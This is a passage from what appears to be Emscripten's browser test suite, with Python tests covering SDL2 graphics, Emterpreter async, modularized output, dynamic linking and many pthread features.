args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
def test_cocos2d_hello(self):
from tools import system_libs
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=60)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = Module.print;
Module.print = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js', '-s', 'WASM=1']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.js'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.js', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=60, also_wasm=False)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30, also_wasm=False)
# Tests the rest of the remaining GCC atomics after the two above tests.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30, also_wasm=False)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
# This test hangs the chrome render process, and keep subsequent tests from passing too
return self.skip("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html'], timeout=30, also_wasm=False)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html'], timeout=30, also_wasm=False)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.pthreadMainPrefixURL" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
